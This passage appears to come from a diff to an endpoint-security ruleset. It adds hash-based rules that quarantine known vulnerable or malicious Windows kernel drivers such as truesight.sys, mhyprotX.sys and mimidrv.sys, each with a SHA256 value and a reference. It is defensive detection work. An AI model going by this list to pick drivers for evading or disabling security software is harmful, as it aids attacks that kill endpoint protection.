"2026-03-23T11:45:30.819675Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.819680Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "060d25126e45309414b380ee29f900840b689eae4217a8e621563f130c1d457f", + "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6cedc317-06d0-5f0d-90f8-b68f58eb38a7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": 
"af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.832133Z", + "creation_date": "2026-03-23T11:45:30.832135Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.832141Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2749d7e7af1d4a0152ab690eaff93c17ffc587e203cec960a4e82eddee86147a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6cfca489-3930-5253-b47a-3f779247c35b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.616860Z", + "creation_date": "2026-03-23T11:45:29.616864Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.616885Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "9022cdd52aa3420757d5c16fe61a4fd4d538fe74981ddf3f29de00eb7a3be849", + "comment": 
"American Megatrends vulnerable BIOS flash tool (aka UCOREW64.SYS and amifldrv64.sys) [https://www.loldrivers.io/drivers/a338a9fc-9fe3-400c-9fe4-69bb7892602d/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6d0cbf53-cde9-501b-b716-1eec52f624b6", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.494169Z", + "creation_date": "2026-03-23T11:45:31.494172Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.494181Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "b64faa54484770a73e4e87f633374b409904997fbcb47da8af94a7f081661519", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6d20b998-3850-5bb5-bf4a-9d9c7a8be162", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": 
"b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.619018Z", + "creation_date": "2026-03-23T11:45:29.619020Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.619026Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "ab3fe6cbd9e3d70a64c5f3b186126cc38a04a624ceefc46afe4825f2001a3caa", + "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6d2c0441-4717-560a-a346-1d3e65715b25", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.612198Z", + "creation_date": "2026-03-23T11:45:29.612200Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.612205Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "aa717e9ab4d614497df19f602d289a6eddcdba8027c71bcc807780a219347d16", + "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) 
[https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6d4049c5-6b9d-5196-a6ce-a26937a5c190", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.817399Z", + "creation_date": "2026-03-23T11:45:30.817401Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.817407Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2381e9fc518488f51e3ec49d5ca4e59d10727d20678067ca147e50b0c4294f9a", + "comment": "Vulnerable Kernel Driver (aka AODDriver.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "6d40b5b8-74bc-57c2-b973-563a0ede62e1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144521Z", + 
"creation_date": "2026-03-23T11:45:32.144523Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144529Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4d8bc539ca7c72e552b7065d2a84fef43b75a46a53c82b50556c2984e0a86a9e",
+ "comment": "Malicious Kernel Driver (aka driver_4d8bc539.sys) [https://www.loldrivers.io/drivers/e7fd8ffc-ab37-4a7b-8dc9-fc7432fbacae/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d458b79-b71a-5b0f-965c-fcdb16621ee7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.475060Z",
+ "creation_date": "2026-03-23T11:45:31.475064Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.475074Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "92a0fba8c1598f73e1021e5e4607a7cfab6ed1cef1056d2a1bcdec47dd55391d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": 
"6d465f08-a4f5-5e97-8fe8-058827ee4c6e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143150Z",
+ "creation_date": "2026-03-23T11:45:32.143152Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143158Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4160dae22484062ccc3750cc9cac8f929d8701694160a3b508715610814aa28d",
+ "comment": "Vulnerable Kernel Driver (aka echo_driver.sys) [https://www.loldrivers.io/drivers/afb8bb46-1d13-407d-9866-1daa7c82ca63/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d4764b3-5c35-5b66-b82b-bca5f7c65c3e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145377Z",
+ "creation_date": "2026-03-23T11:45:31.145379Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": 
"2026-03-23T11:45:31.145384Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dcb2cd8c703f3b378be66a6a5f5283e9393a280df68a6b8f9d227c6aa8b92824",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d69fe65-8b59-5e30-9de0-a7635a77ae83",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156021Z",
+ "creation_date": "2026-03-23T11:45:31.156022Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156028Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "821401e4becfc52522485719c8f5375889e7d4281c6d76bdb76ccfa332e8a102",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d874781-b2b2-56d9-a9a5-9efd07a1acd9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ 
"effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.452942Z",
+ "creation_date": "2026-03-23T11:45:30.452954Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.452963Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6c5aef14613b8471f5f4fdeb9f25b5907c2335a4bc18b3c2266fb1ffd8f1741d",
+ "comment": "Vulnerable Kernel Driver (aka nicm.sys) [https://www.loldrivers.io/drivers/86cff0de-2536-4b8d-a846-a7312c569597/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d9369f3-485c-5c87-b526-a40568e50bc1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.974766Z",
+ "creation_date": "2026-03-23T11:45:29.974768Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.974774Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": 
"45624a7469927b999cce153ff0074f675a8c062c5afa3f0c688b6124874ca27a",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d95c489-0cc2-57f1-858a-c57a0e76f43c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.606629Z",
+ "creation_date": "2026-03-23T11:45:29.606631Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.606636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f0fb06748758082263e252050904f2fd8a29a77ae71dfdb390346bd2046ebfd4",
+ "comment": "Process Explorer driver (aka PROCEXP.SYS and PROCEXP152.SYS) [https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6d97e72c-1f6b-57b2-84d1-f6e068b79040",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ 
"username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.823526Z",
+ "creation_date": "2026-03-23T11:45:31.823529Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.823538Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "316dab59da430edeb47e6d2a95e7f4a6cee385be96353340151a606e05b4d8cd",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6da2bf15-5dfa-55d4-8d7e-e22051c03e66",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824189Z",
+ "creation_date": "2026-03-23T11:45:31.824192Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824201Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c83986522ab62386c1568b4cd7ab597b72e6022bdbc63bb7a9fc634138c59467",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6da649c5-2a75-5528-8ca6-cafc8ba21aa7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834996Z",
+ "creation_date": "2026-03-23T11:45:30.834999Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.835009Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0b6af15d8afb49cecd9803a72ed7598b9cd4b2725a2df9e73decca0f7ddd9e81",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6da6ea9a-fc0c-526f-b061-075b7ccf4d62",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.145094Z",
+ "creation_date": 
"2026-03-23T11:45:32.145096Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145102Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9088392c38d6b8b7cbcc0959d51f0440f211b037408314b51d393b8aa83d44eb",
+ "comment": "Malicious Kernel Driver (aka driver_ef9d653a.sys) [https://www.loldrivers.io/drivers/14e51012-5429-483e-9423-49778c3bd1c2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6dae4cd0-8504-5651-acbc-da9c361e0769",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.453978Z",
+ "creation_date": "2026-03-23T11:45:30.453981Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.453990Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "497a836693be1b330993e2be64f6c71bf290c127faca1c056abd0dc374654830",
+ "comment": "Malicious Kernel Driver (aka a236e7d654cd932b7d11cb604629a2d0.sys) [https://www.loldrivers.io/drivers/2866bd72-a4b1-4764-a838-9ed0790c2631/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6dc453fd-fd35-5583-8d13-4ee8acb8699e",
+ "test_maturity_current_count": 0,
+ 
"test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611359Z",
+ "creation_date": "2026-03-23T11:45:29.611361Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611366Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "abf635a246752555868f203a565ead519c9ada06ea007545a47bf352678c342a",
+ "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6dcd1acb-cb65-5f6d-9d99-d3bc6bd6a1f5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.464912Z",
+ "creation_date": "2026-03-23T11:45:30.464915Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.464923Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62036cdf3663097534adf3252b921eed06b73c2562655eae36b126c7d3d83266",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6dcd538a-587d-527f-8a3a-21829db2b0bb",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.819394Z",
+ "creation_date": "2026-03-23T11:45:30.819396Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.819401Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d2da77e10d2fd2b8b2aa68ab4af1483ef270311c846644e0ec61ace146ee6feb",
+ "comment": "Vulnerable Kernel Driver (aka VdBSv64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "6dd41b7f-04af-5749-bb5b-4d2f6c5e8f41",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
